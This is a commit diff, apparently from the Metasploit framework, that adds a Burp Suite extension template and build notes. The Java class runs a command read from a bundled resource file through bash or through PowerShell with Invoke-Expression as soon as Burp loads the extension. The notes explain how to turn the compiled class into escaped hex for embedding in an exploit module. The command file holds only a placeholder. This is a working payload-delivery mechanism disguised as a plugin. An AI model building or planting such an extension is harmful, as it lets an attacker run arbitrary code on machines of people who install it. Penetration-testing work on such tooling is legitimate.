non-compile working just needs testing

h00die · Jan 1, 2025 · 4465260 · 4465260
1 parent f22380c
commit 4465260
Show file tree

Hide file tree

Showing 6 changed files with 140 additions and 69 deletions.
diff --git a/data/exploits/burp_extension/build.gradle b/data/exploits/burp_extension/build.gradle
@@ -12,7 +12,10 @@ dependencies {
 sourceSets {
     main {
         java {
-            srcDir '.'
+            srcDir 'src/main/java'
+        }
+        resources {
+            srcDir 'src/main/resources'
         }
     }
 }

diff --git a/data/exploits/burp_extension/notes.txt b/data/exploits/burp_extension/notes.txt
@@ -4,3 +4,4 @@ Updating payload in module:
   1. Run the build command inside of this folder (data/exploits/burp_extension)
   2. jar xf build/libs/MetasploitPayloadExtension.jar
   3. Use this command to print out the hex: python3 -c "with open('burp/BurpExtender.class', 'rb') as f: print(''.join([chr(b) if 32 <= b <= 126 else '\\\\x{:02x}'.format(b) for b in f.read()]))"
+  4. You'll still need to escape \ and " characters.
diff --git a/data/exploits/burp_extension/src/main/java/BurpExtender.java b/data/exploits/burp_extension/src/main/java/BurpExtender.java
@@ -0,0 +1,50 @@
+// from https://github.com/PortSwigger/example-hello-world/blob/master/java/BurpExtender.java
+package burp;
+
+import java.io.PrintWriter;
+import java.io.InputStream;
+import java.nio.charset.StandardCharsets;
+import java.util.Scanner;
+
+public class BurpExtender implements IBurpExtender {
+    @Override
+    public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
+        // Read extension name from resource file and set it
+        InputStream nameInputStream = getClass().getClassLoader().getResourceAsStream("name.txt");
+        Scanner nameScanner = new Scanner(nameInputStream, StandardCharsets.UTF_8.name());
+        String extensionName = nameScanner.useDelimiter("\\A").next().trim();
+        callbacks.setExtensionName(extensionName);
+
+        // Read command from resource file
+        InputStream commandInputStream = getClass().getClassLoader().getResourceAsStream("command.txt");
+        Scanner commandScanner = new Scanner(commandInputStream, StandardCharsets.UTF_8.name());
+        String command = commandScanner.useDelimiter("\\A").next().trim();
+
+        // obtain our output and error streams
+        PrintWriter stdout = new PrintWriter(callbacks.getStdout(), true);
+        PrintWriter stderr = new PrintWriter(callbacks.getStderr(), true);
+
+        // Detect operating system
+        String os = System.getProperty("os.name").toLowerCase();
+        Process process;
+
+        try {
+            stdout.println("Initializing extension.");
+
+            if (os.contains("win")) {
+                // Windows: Use cmd.exe or PowerShell
+                String windowsCommand = "powershell.exe -Command \""
+                        + command
+                        + "[Convert]::FromBase64String | ForEach-Object {$_ -join ''} | Invoke-Expression\"";
+
+                process = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", windowsCommand});
+            } else {
+                // Unix-based systems: Use /bin/bash
+                process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", command});
+            }
+            stdout.println("Finished initializing extension.");
+        } catch (Exception e) {
+            stderr.println("Error loading extension: " + e.getMessage());
+        }
+    }
+}
diff --git a/data/exploits/burp_extension/src/main/resources/command.txt b/data/exploits/burp_extension/src/main/resources/command.txt
@@ -0,0 +1 @@
+FOOBARBAZ
diff --git a/data/exploits/burp_extension/src/main/resources/name.txt b/data/exploits/burp_extension/src/main/resources/name.txt
@@ -0,0 +1 @@
+Metasploit Payload Extension